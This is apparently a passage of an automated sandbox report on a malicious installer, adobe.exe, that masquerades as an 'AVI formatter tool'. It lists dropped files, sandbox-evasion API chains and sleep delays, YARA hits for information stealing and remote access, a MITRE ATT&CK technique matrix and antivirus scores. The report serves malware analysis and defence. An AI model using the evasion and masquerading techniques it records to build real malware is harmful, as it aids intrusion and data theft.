                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 2_2_00401B4B
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_00401B4B
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_02A1F927
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Window / User API: threadDelayed 9668
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-P1JK8.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libFLAC_dynamic.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwebp.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-LAMVM.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-N9KV6.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GDO6P.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-29FOL.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-QIBJG.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\sd.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_RegDLL.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\tak_deco_lib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GV1D3.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-OJAID.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libsoxr.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-62TD5.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dstt.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G867L.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-2NPHT.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-6BR28.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-NLBLP.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-DGTCL.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\rg_ebur128.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\pcm2dsd.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\gain_analysis.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-O3BDJ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\mp3gain.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-USOE1.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B5I6T.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TS18M.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\uchardet.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\wavpackdll.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_shfoldr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-H7480.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-1V9NR.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G9QV0.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_setup64.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\takdec.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\is-D26SF.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-L5R6H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-M7I8F.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAAP8.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\lame_enc.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libdtsdec.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\ff_helper.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\unins000.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-7MMUT.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\utils.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B8D2L.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwinpthread-1.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-268GJ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-R0SOB.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAMVB.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_isdecmp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5EUCF.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-CHQ62.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-RTU9Q.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5PBSD.tmp
                Source: C:\Users\user\Desktop\adobe.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5550
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_2-2476
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404 Thread sleep count: 116 > 30
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404 Thread sleep time: -232000s >= -30000s
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7904 Thread sleep count: 107 > 30
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7904 Thread sleep time: -6420000s >= -30000s
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404 Thread sleep count: 9668 > 30
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404 Thread sleep time: -19336000s >= -30000s
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe File opened: PhysicalDrive0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00474078 FindFirstFileA,FindNextFileA,FindClose, 1_2_00474078
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_004520D0 FindFirstFileA,GetLastError, 1_2_004520D0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_0049676C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_0049676C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00463504 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463504
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00463980 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463980
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00461F78 FindFirstFileA,FindNextFileA,FindClose, 1_2_00461F78
                Source: C:\Users\user\Desktop\adobe.exe Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B30
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Thread delayed: delay time: 60000
                Source: aviformattertool.exe, 00000003.00000002.2905592676.0000000003300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000007D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\adobe.exe API call chain: ExitProcess graph end node graph_0-6682
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe API call chain: ExitProcess graph end node graph_2-2866
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe API call chain: ExitProcess graph end node graph_3-18143
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe API call chain: ExitProcess graph end node graph_3-17872
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: 3_2_02A3013E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 3_2_02A3013E
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A164DC RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_02A164DC
Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A294A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02A294A8
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00477120 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00477120
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A27FED cpuid 3_2_02A27FED
Source: C:\Users\user\Desktop\adobe.exe | Code function: GetLocaleInfoA,0_2_004051FC
Source: C:\Users\user\Desktop\adobe.exe | Code function: GetLocaleInfoA,0_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: GetLocaleInfoA,1_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: GetLocaleInfoA,1_2_004085BC
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00457DE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457DE8
Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00454AC8 GetUserNameA,1_2_00454AC8
Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                Stealing of Sensitive Information

Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp, type: DROPPED
Source: Yara match | File source: 00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aviformattertool.exe PID: 7388, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp, type: DROPPED
Source: Yara match | File source: 00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aviformattertool.exe PID: 7388, type: MEMORYSTR
MITRE ATT&CK matrix (one technique per tactic column; a number in parentheses is the count of signatures that triggered for that technique; empty cells are tactics with no entry in that row):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
Valid Accounts | Native API (3) | Windows Service (4) | Exploitation for Privilege Escalation (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | System Shutdown/Reboot (1) | Acquire Infrastructure | Gather Victim Identity Information
Default Accounts | Service Execution (2) | Bootkit (1) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel (2) | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
Domain Accounts | At | Logon Script (Windows) | Windows Service (4) | Software Packing (23) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port (1) | | | Data Encrypted for Impact | DNS Server | Email Addresses
Local Accounts | Cron | Login Hook | Process Injection (2) | Masquerading (1) | NTDS | System Information Discovery (35) | Distributed Component Object Model | Input Capture | Traffic Duplication | Non-Application Layer Protocol (2) | | | Data Destruction | Virtual Private Server | Employee Names
Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (21) | LSA Secrets | Security Software Discovery (41) | SSH | Keylogging | Scheduled Transfer | Application Layer Protocol (12) | | | Data Encrypted for Impact | Server | Gather Victim Network Information
Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Access Token Manipulation (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (21) | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties
External Remote Services | Systemd Timers | Startup Items | Startup Items | Process Injection (2) | DCSync | Application Window Discovery (11) | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS
Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Bootkit (1) | Proc Filesystem | System Owner/User Discovery (3) | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol | | | Defacement | Serverless | Network Trust Dependencies
Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | Remote System Discovery (1) | Direct Cloud VM Connections | Data Staged | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Web Protocols | | | Internal Defacement | Malvertising | Network Topology
Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | File Transfer Protocols | | | External Defacement | Compromise Infrastructure | IP Addresses

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

Source | Detection | Scanner | Label
adobe.exe | 100% | Avira | HEUR/AGEN.1332570
Source | Detection | Scanner | Label
C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy) | 0% | ReversingLabs |
